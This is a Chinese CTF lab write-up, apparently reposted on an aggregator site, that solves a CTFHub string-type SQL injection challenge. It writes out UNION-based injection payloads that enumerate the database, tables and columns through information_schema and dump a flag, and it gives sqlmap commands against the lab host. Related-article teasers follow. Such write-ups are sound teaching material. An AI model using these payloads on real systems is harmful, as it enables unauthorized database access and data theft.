CTFHUB技能树之SQL——字符型注入

CTFHUB技能树之SQL——字符型注入

news/2024/10/18 12:15:45/文章来源:https://blog.csdn.net/weixin_73049307/article/details/142927306

开启靶场，打开链接：

直接指明是SQL字符型注入，但还是来判断一下

（1）检查是否存在注入点

1' and 1=1#

返回正确

1' and 1=2#

返回错误

说明存在SQL字符型注入

（2）猜字段数

1' order by 2#

1' order by 3#

说明字段数是2

（3）爆数据库名

1' and 1=2 union select 1,database()#

得知数据库名是sqli

（4）爆表名

1' and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'#

显示表名是news表和flag表，其中flag表是我们需要的

（5）爆列名

1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'#

得知flag表的列名是flag

（6）爆字段内容（flag）

1' and 1=2 union select 1,group_concat(flag) from sqli.flag#

成功得到flag：

ctfhub{ee5bfa3b423eb2d6142c66b9}

接下来就用一下sqlmap来试一下：

python sqlmap.py -u "http://challenge-a046856826dbc5de.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables

python sqlmap.py -u "http://challenge-a046856826dbc5de.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --dump

一样成功得到flag

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/881941.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

QT--单选按钮（QRadioButton）和复选按钮（QCheckBox）

QT--单选按钮（QRadioButton）和复选按钮（QCheckBox）

在Qt中，单选按钮（QRadioButton）和复选按钮（QCheckBox）是两种常用的用户界面控件，它们的主要区别在于选择行为和用途： QRadioButton（单选按钮） 选择行为：单选…

阅读更多...

Gin框架操作指南01：开山篇

Gin框架操作指南01：开山篇

Gin是目前最流行，性能最好的的GoWeb框架，几乎成为了学习GoWeb必备的知识。本人最近也在学Gin，在b站搜了很多教程，发现有的教程不够详细，有的教程工具包安装有问题，而官方文档的很多示例代码又不全&#xff…

阅读更多...

抖音解压视频素材宝库

抖音解压视频素材宝库

在快节奏的生活中，解压视频成为抖音上的热门内容类型，想要制作出精彩的解压视频，优质素材必不可少。今天，为大家推荐几个超棒的抖音解压视频素材网站，让你的创作之路轻松无忧！ 蛙学网作为国内知名的短视频…

阅读更多...

$深度解析计数排序：原理、特性与应用$

深度解析计数排序：原理、特性与应用

目录 💯引言 💯计数排序的原理 ⭐核心概念 ⭐工作流程 1.确定计数范围 2.统计元素出现次数 3.计算累计计数 4.放置元素到正确位置 💯计数排序的实现 ⭐代码示例（以 C 为例） ⭐时间复杂度分析 ⭐稳定性分析…

阅读更多...

【AI学习】Mamba学习（七）：HiPPO通用框架介绍

【AI学习】Mamba学习（七）：HiPPO通用框架介绍

HiPPO这篇论文《HiPPO: Recurrent Memory with Optimal Polynomial Projections》，提出了一个通用框架。我们再重新看一下论文的摘要： 从连续数据中学习的一个核心问题是，随着更多数据的处理，以增量方式表示累积历史。我们介绍了…

阅读更多...

「规模焦虑」如影随形，库迪咖啡想靠便捷店突围能行吗？

「规模焦虑」如影随形，库迪咖啡想靠便捷店突围能行吗？

作者 | 辰纹来源 | 洞见新研社 “我有一个广东的小兄弟，做了9年的奶茶，后来因为觉得咖啡是一个上升期的赛道，所以毅然决然拿了45万加盟了库迪咖啡，结果全亏损完了，相当于只买了一个配方。” 抖音博主茶饮圈大山哥分…

阅读更多...

Vite创建Vue3项目以及Vue3相关基础知识

Vite创建Vue3项目以及Vue3相关基础知识

1.创建Vue3项目 1.运行创建项目命令 # 使用 npm npm create vitelatest2、填写项目名称 3、选择前端框架 4、选择语法类型 5、按提示运行代码不出意外的话，运行之后应该会出现下边这个页面 6.延伸学习：对比webpack和vite（这个是面试必考…

阅读更多...

【微服务】springboot远程docker进行debug调试使用详解

【微服务】springboot远程docker进行debug调试使用详解

目录一、前言二、线上问题常用解决方案 2.1 微服务线上运行中常见的问题 2.2 微服务线上问题解决方案 2.3 远程debug概述 2.3.1 远程debug原理 2.3.2 远程debug优势三、实验环境准备 3.1 搭建springboot工程 3.1.1 工程结构 3.1.2 引入基础依赖 3.1.3 添加配置文…

阅读更多...

400行程序写一个实时操作系统（九）：替换FreeRTOS的内存管理算法

400行程序写一个实时操作系统（九）：替换FreeRTOS的内存管理算法

前言通过前面几章，笔者带领大家完成了内存管理算法的编写。我们完成的内存管理算法，被称为小内存管理算法。我们也可以将它作为一个库，在后续的嵌入式开发中，使用我们自己编写的malloc，不仅效率会更高，…

阅读更多...

机器学习笔记-2

机器学习笔记-2

文章目录一、Linear model二、How to represent this function三、Function with unknown parameter四、ReLU总结、A fancy name 一、Linear model 线性模型过于简单，有很大限制，我们需要更多复杂模式蓝色是线性模型，线性模型无法去表示…

阅读更多...

如何匿名浏览网站，保护在线隐私？

如何匿名浏览网站，保护在线隐私？

在现如今的网络世界，在线隐私已不复存在。你总是被跟踪，即使你使用隐身模式也无济于事。隐身模式会阻止浏览器保存你的浏览历史记录。但它并不能阻止你的互联网服务提供商 (ISP)、雇主、学校、图书馆或你访问的网站看到你在网上做什么。更有不法分子在未…

阅读更多...

Lumerical学习——资源管理和运行模拟

Lumerical学习——资源管理和运行模拟

一、资源管理（Resource Manager） 在模拟计算前必须对计算资源进行配置。采用资源管理器可以完成这项任务。单击主工具条的“资源（Resources）”按钮（见上图）就可以打开资源管理器。通常每个计算机只需设置一…

阅读更多...

大型生物制药企业如何实现安全又高效地跨网域数据传输？

大型生物制药企业如何实现安全又高效地跨网域数据传输？

大型生物制药企业由于组织结构庞大、业务覆盖研发、生产及销售，因此内部会再细分为多个管理单位，包括研发部门、生产部门、质量控制部门、供应链管理部门及营销部和日常业务支撑部门等。在物理区域划分上，大型生物制药企业会设立实验室、研发…

阅读更多...

摇人摇人, JD内推岗位(社招+校招)

摇人摇人, JD内推岗位(社招+校招)

摇人摇人, 有找工作的家人们看过来啊~ 虚位以待, 快到碗里来算法开发工程师岗京东云北京|T7, 5-10年岗位职责： 参与基于RAG知识库平台和ChatBI产品打造和商业化落地，进行相关技术：包括OCR、文档拆分、意图理解、多轮对话、NL2SQL、Embed…

阅读更多...

mysql用户管理(user表列信息介绍,本质,管理操作),数据库的权限管理(权限列表,权限操作)

mysql用户管理(user表列信息介绍,本质,管理操作),数据库的权限管理(权限列表,权限操作)

目录用户管理介绍 user表介绍列信息 Host User *_priv authentication_string 用户管理的本质操作创建用户删除用户修改用户信息修改密码自己修改 root用户修改指定用户的密码数据库的权限权限列表给用户授权查看权限回收权限刷新权限 …

阅读更多...

Linux性能调优，还可以从这些方面入手

Linux性能调优，还可以从这些方面入手

linux是目前最常用的操作系统，下面是一些常见的 Linux 系统调优技巧，在进行系统调优时，需要根据具体的系统负载和应用需求进行调整，并进行充分的测试和监控，以确保系统的稳定性和性能。同时，调优过程中要谨…

阅读更多...

万界星空科技：智能称重打标系统

万界星空科技：智能称重打标系统

万界星空科技的称重系统是其为制造业，特别是线缆、漆包线、食品等行业提供的重要解决方案之一。以下是对该系统的详细介绍： 一、系统概述万界星空科技称重系统是集成在其MES（制造执行系统）中的一个功能模块，专门用于…

阅读更多...

基于springboot实习管理系统

基于springboot实习管理系统

作者：计算机学长阿伟开发技术：SpringBoot、SSM、Vue、MySQL、ElementUI等，“文末源码”。系统展示【2024最新】基于JavaSpringBootVueMySQL的，前后端分离。开发语言：Java数据库：MySQL技术：…

阅读更多...

React Agent 自定义实现

React Agent 自定义实现

目录背景 langchin 中的 agent langchin 中 agent 的问题 langchain 的 agent 案例自定义 React Agent 大模型工具定义问题设定问题改写，挖掘潜在意图 React Prompt 下一步规划问题总结代码背景之前使用过 langchian 中的 agent 去实现过一些…

阅读更多...

2020年计算机网络408真题解析

2020年计算机网络408真题解析

第一题： 解析：OSI参考模型网络协议的三要素网络协议的三要素：语法 ，语义，同步（时序） 语法：定义收发双方所交换信息的格式语法：定义收发双方所要完成的操作网页的加载 …

阅读更多...

推荐文章

最新文章